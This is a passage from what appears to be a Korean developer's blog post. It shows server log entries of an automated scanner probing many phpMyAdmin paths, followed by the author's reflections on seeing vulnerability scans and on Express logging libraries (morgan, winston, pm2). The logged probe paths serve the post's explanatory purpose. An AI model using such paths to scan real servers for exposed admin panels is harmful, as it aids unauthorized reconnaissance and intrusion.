::ffff:82.64.52.204
GET : /administrator/phpmyadmin/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:31:45 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /PMA2020/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:31:45 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /pma2017/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:31:46 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /PMA2017/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:31:46 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /php-myadmin/index.php?lang=en
-----
-----
Wed Feb 16 2022 17:31:47 GMT+0900 (Korean Standard Time)
::ffff:82.64.52.204
GET : /phpMyAdmin-4.9.7/index.php?lang=en
-----1분넘게 php관련 취약점 스캔도 받았다.
이후 22일까지 로그를 가지고 있으나, 쭉 봐도 별다른 특별한 것은 없었다.
위에 작성했던 요청과 비슷한 것들이 대부분이며, 파비콘 긁어가는 봇, 취약점 공격인지 아닌지도 모르는 정말 이상한 요청들, 내가 직접 요청했던 게시글 조회, 작성과 같은 요청들이 있었다.
Comprehensive list of attack/probe URL’s
검색을 하다가 찾은 것인데, 여기보면 exploit attack url들을 정리해놓은 게시글도 존재한다.
이런 요청들이 실제로 온다는 것을 직접 확인해보고 그런 요청들을 분석하게 되었다는 사실이 정말 놀라운 경험이다.
로그 찍는 미들웨어를 그냥 응답 객체에 들어있는 값 가지고 억지로 콘솔에 작성하게 했었다.
하지만, 일반적인 express 기반 서버들이 로그를 사용하기 위한 유명한 라이브러리가 존재하는 것을 알게되었다.
morgan 이라는 logger 라이브러리인데 request, response를 깔끔하게 포매팅 해주고, 호출된 router가 어떤 상태이고, 어떤 결과 값인지를 보여준다고 한다.
또한 이렇게 실시간으로 콘솔에 찍힌 것 말고도 json 형태로 dump파일에 기록해주는 winston이라는 것도 있다고 한다.
나는 이런 모듈 설치가 없이도 로그가 파일로 저장이 되었는데, 이는 pm2자체에 내장되어있는 어떤 기능이 아닐까 추측된다.
다음에는 로그를 남기게 될 일이 있다면 위와같은 것들을 사용해야겠다.